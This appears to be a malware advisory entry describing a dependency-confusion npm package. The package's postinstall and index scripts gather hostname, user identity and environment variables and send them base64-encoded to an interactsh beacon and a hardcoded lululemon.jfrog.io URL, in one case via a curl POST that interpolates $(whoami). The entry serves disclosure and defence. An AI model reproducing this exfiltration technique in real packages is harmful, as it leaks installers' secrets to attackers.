MAL-2026-4738

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (c9081ad708b658c1bd56299e401ca6a764cc9137d99573bc922d38a7381cc30d) On `npm install`, postinstall.js collects host identity and environment data (os.hostname(), username, process.cwd(), process.env values, plus shelled-out `whoami`/`hostname`/`id` via child_process.execSync) and ships it over the network. Outbound destinations include `https://app.interactsh.com` (an out-of-band interaction service commonly used for blind-exfiltration / SSRF beacons) and `http://lululemon.jfrog.io` (a JFrog endpoint referenced by hardcoded URL — consistent with a dependency-confusion attack targeting Lululemon's internal package namespace). Collected data is base64-encoded (Buffer.from(...).toString('base64')) before transmission via https.request. index.js additionally constructs a `curl -X POST` command interpolating `$(whoami)`, `$(hostname)`, and `id` and runs it via child_process.exec. The `99.9.0` version number combined with the lululemon.jfrog.io reference is the canonical dependency-confusion fingerprint: publish a public package with a name matching an internal one and a high version to win resolution. Installer harm: identity, environment variables, working-directory contents, and internal-network reachability data are leaked to attacker-controlled infrastructure on every install.